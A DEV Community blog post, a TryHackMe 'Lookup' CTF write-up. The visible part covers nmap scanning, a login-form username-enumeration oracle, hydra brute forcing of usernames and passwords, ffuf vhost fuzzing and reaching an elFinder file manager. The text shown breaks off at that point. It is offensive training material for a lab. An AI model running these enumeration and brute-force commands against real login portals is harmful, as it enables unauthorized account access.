DEV Community

Cover image for TryHackMe : Lookup writeup
Yogeshwar Peela
Yogeshwar Peela

Posted on Originally published at exploitnotes.hashnode.dev

TryHackMe : Lookup writeup

Summary

Lookup is an easy Linux box built around a login portal that redirects authenticated users to a vhost-hosted elFinder file manager. Username enumeration on the login form combined with password brute forcing yields valid credentials, which unlock a vulnerable elFinder 2.1.47 instance. A Metasploit module exploiting an exiftran command injection in the PHP connector gives a www-data shell. A custom SSH password wordlist built around the compromised user's naming pattern cracks the think account, and a SUID look binary misconfiguration in sudoers grants root file read access.

1. Reconnaissance

nmap -A -Pn  -o nmap
Enter fullscreen mode Exit fullscreen mode
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm
Enter fullscreen mode Exit fullscreen mode

Port 80 redirects to a vhost, so it gets added to /etc/hosts.

echo ' lookup.thm' >> /etc/hosts
Enter fullscreen mode Exit fullscreen mode

2. Web Enumeration

Root of lookup.thm serves a simple login form posting to login.php.

curl http://lookup.thm/
Enter fullscreen mode Exit fullscreen mode
 action="login.php" method="post">
   type="text" id="username" name="username" required>
   type="password" id="password" name="password" required>

Enter fullscreen mode Exit fullscreen mode

2.1 Username enumeration

The application returns different error strings depending on whether the username exists:

curl http://lookup.thm/login.php -d 'username=admin&password=admin'
Wrong password. Please try again.

curl http://lookup.thm/login.php -d 'username=test&password=admin'
Wrong username or password. Please try again.
Enter fullscreen mode Exit fullscreen mode

This is a textbook user-enumeration oracle - "Wrong password" confirms the username exists, "Wrong username or password" means it doesn't.

2.2 Username brute force

hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p wrongpass lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:S=Wrong password" -t 64
Enter fullscreen mode Exit fullscreen mode
[80][http-post-form] host: lookup.thm   login: admin   password: wrongpass
[80][http-post-form] host: lookup.thm   login: jose    password: wrongpass
Enter fullscreen mode Exit fullscreen mode

Valid usernames: admin, jose.

2.3 Password brute force

hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong password"
Enter fullscreen mode Exit fullscreen mode
[80][http-post-form] host: lookup.thm   login: jose   password: password123
Enter fullscreen mode Exit fullscreen mode

2.4 Authenticated redirect

curl -v -L http://lookup.thm/login.php -d 'username=jose&password=password123'
Enter fullscreen mode Exit fullscreen mode
< Set-Cookie: login_status=success; ...
< Location: http://files.lookup.thm
Enter fullscreen mode Exit fullscreen mode

Add the new vhost and confirm with ffuf that it's the only relevant subdomain:

echo ' lookup.thm files.lookup.thm' >> /etc/hosts

ffuf -u http://lookup.thm/ -H "HOST: FUZZ.lookup.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac
Enter fullscreen mode Exit fullscreen mode
www   [Status: 200, Size: 719, Words: 114, Lines: 27, Duration: 2432ms]
Enter fullscreen mode Exit fullscreen mode

3. elFinder Discovery

Using the login_status cookie to access the new vhost reveals an elFinder web file manager:

curl -c cookies.txt http://lookup.thm/login.php -d 'username=jose&password=password123'
curl -L -b cookies.txt http://files.lookup.thm/
Enter fullscreen mode Exit fullscreen mode
</span>elFinder<span class="nt">